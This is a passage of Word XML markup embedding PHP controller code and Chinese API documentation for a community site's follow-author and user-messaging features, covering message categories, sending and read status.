          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291168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1BE809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C1A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3D1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_id = input('param.article_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F347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_id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1518F9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A34D5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社区动态</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57FE5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316B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B67F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6354D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circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E057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article_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8300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0EAE06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rticle)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A6E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z_uid'] = $article['member_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5383E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 = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075282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3583E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B62A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_guanzhu)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436DBE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guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642157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6E14CB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delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC97E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取消关注您</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030BBE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA6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8C520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取消关注动态作者成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D881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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F172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D2FA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CEFBB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040BD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_id = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A17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73637C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guanzhu_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB5D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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户【</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $this-&gt;member['username'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>】已关注您</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E103A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tify($this-&gt;memberId, $article['member_id'], $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA89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1D57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关注动态作者成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0690C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7C412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4D24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8586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282BB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C571E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5337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社区动态不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C3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4BC386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1A0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BF61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15E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3A534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关注动态作者失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CABB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38AE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380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221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CAF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circle/followed_authors </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户关注的动态作者列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B882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当前用户关注的动态作者列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E36C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社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC99F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4F1C4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A1366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动态作者列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45465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uthor.username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F787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uthor.img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51049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uthor.follow_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D9A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uthor.article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者发表文章数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5163E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关注动态作者失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDB2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14CB95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2156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ed_authors()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570083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C97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227C6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5AFC29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6CBB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18F0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06965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05103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0295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307E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authors = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C727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3EADE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30EDF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authors) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33771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ollowed_authors as $key =&gt; $followed_author) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B451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or = _user($followed_author['gz_uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25251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author)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A00F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authors[$key]['author'] = $author;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33604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authors[$key]['author']['img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B7B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authors[$key]['author']['follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D27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followed_author['gz_uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7CB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1E6F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ollowed_authors[$key]['author']['article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFC7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followed_author['gz_uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB88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5266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authors[$key]['author']['article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E403C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followed_author['gz_uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E5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50FDF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01DA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154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7B2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followed_authors);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A90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FDBB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7172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5F76C7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6AC49F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14215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5DD50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ssage extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F97B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A8FF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50831A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50A4D3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450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18E3E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B30D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6524F5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F461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1B4D3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86D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38DF8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03C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74133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1FF13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041F9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4A27BC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71646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34E53D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598290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00DD94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4F9D6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63DF58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0A598A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2832F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5536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2AFAF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792C78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1425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F2FC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1D83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701654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23BC5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AFB2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06677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5601CF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1E8F73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4DD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953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86B32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13737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4F54B5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7FB4EE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B3A2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606E47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01CCB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EDB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CA23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DCBF1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FF4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3F3C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4E4C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55E23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61EE8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FC3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9DE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75413A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6D5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A42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0085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053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ssage/create_type </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建消息分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021DA8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创建消息分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB6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6AB8EC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35A3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477C3C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itle       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类名称（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F27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description </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类备注（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45EB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消息分类创建成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276EA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消息分类创建失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39E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7A50D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4E2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reate_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7290B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533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71BD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10805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创建消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCC42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60F14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379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DE1C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input('param.title', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D09C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title'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF461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9435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消息分类名称不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F595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7E3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028D6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type = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058BC8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itle', $data['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C5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493D15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ssage_type)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476F6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73BF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同名消息分类已存在，请更换消息分类名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C78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A07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54F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input('param.description', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F4C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time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3670C0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type_id = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA11B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25B5D6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_type_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC87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DA9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消息分类创建成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29631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1FE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176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40E8A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消息分类创建失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF27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015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9E3A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2DD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ssage/types </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取消息分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C6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消息分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B17A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27B3E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AD723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message_types  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B5A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消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194C0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itle        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息分类标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F44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escription  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息分类备注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A335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message_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E743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0F9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s()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE35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CCB6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types = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50708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06FA3F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message_types) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4958E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message_types as $key =&gt; $message_type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EA61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types[$key]['message_num'] = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249BA4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type_id', $message_type['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FE86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C6915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5E8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6C8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message_types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CBB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2008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F67D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ssage/send </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发送消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614889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发送消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB9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3C03F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E81E2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7ECE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ype_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F9C3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member_id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息接收者</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D84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article_id        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52274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ircle_id         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482376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ircle_article_id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1380C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in_id           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E967E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非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7275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ymbol            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0816BA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消息内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFF0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link      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相关链接（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544CDC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消息发送成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C2FE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消息发送失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA88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7EC2D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CC2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end()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CA6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4C6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12895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ender_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFCBA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6796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A5FF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发送消息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBBF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3C6C9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A6CB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C7E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_id'] = input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB98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type_id'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F132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F834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消息分类</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912B9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577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B89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cipient_id'] = input('param.member_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D943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recipient_id'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF55B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8BC2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消息接收者</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4552E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B09F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E4AE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rticle_id'] = input('param.article_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42167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id'] = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720DA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ircle_article_id'] = input('param.circle_article_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1084A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in_id'] = input('param.coin_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B984D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xchange'] = input('param.exchange', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDFB3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ymbol'] = input('param.symbol', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED9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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61227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content'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D10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004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消息内容不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8EE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DBF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231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link'] = input('param.link', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264E0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ad'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A62C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create_time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9AB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id = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597C10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079A0B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_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC4AB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F6B4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消息发送成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D79D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65BD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65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B538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消息发送失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0355BB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080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505E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43D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ssage/read </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阅读消息｜标记消息状态为已读</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BDFA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阅读消息｜标记消息状态为已读</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3475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068DB7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5CC3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651A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message_id  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C10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阅读消息成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD505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阅读消息失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36458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2566D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6EB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ad()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570DF8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A3E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444CF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cipient_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAD1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BB34C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88CC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加入消息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF848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2029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A3E2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444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d'] = input('param.message_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D124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id'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A99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D8DDE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消息</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690E8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24BD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8E8C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 = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A4F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B06CF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1F4B6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ssage)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A261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read'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC1D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ssage')</w:t>
      </w:r>
    </w:p>
